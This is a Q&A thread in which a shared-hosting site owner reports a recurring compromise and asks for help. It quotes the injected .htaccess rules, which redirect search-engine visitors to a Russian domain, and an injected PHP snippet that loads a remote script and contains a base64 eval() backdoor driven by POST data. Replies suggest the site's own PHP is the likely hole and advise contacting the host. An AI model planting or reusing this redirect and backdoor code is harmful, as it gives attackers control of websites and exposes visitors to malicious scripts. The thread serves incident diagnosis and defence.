0

I have a website hosted with Dreamhost and the contents of my .htaccess file are being compromised over and over again. someone is putting stuff like this in the front of my code:

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                     
RewriteRule ^(.*)$ http://float-answer.ru/access/index.php

the chmod of the file is 744. from the last modified time of the file i can estimate when that attack happened.

nothing else seems attacked over the site.

i have already changed all relevant passwords.

edit: it seems worse! several php files have been injected with this codepiece:

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
clamp
  • 175
  • 1
  • 7
  • possible duplicate of [My server's been hacked EMERGENCY](http://serverfault.com/questions/218005/my-servers-been-hacked-emergency) – Shane Madden Jan 04 '12 at 19:47

1 Answers1

2

The chmod 744 means that your htaccess is accessible to whomever owns the file. Is that file owned by www-data? If so, I'd suspect your own PHP code is being used to compromise the data. Changing your passwords will not help you if your sshd or other things have been trojaned. Do you own this server? (or is it hosted, virtual or leased?) What distro are you using? (I assume it is Linux)

mcr
  • 233
  • 1
  • 10
  • thanks! distro is debian. hosting is shared. owner is not www-data but my user. – clamp Jan 04 '12 at 15:53
  • 2
    Notify Dreamhost's support department since this is a shared server and they will be better able to determine when and where the breach came from and also fix it. – daemonofchaos Jan 04 '12 at 16:24
  • already contacted their support, but still waiting for a response. – clamp Jan 04 '12 at 16:41
  • if it is shared hosting, then the php likely runs as your user, so I would still suspect your PHP code is the hole. – mcr Jan 20 '12 at 16:19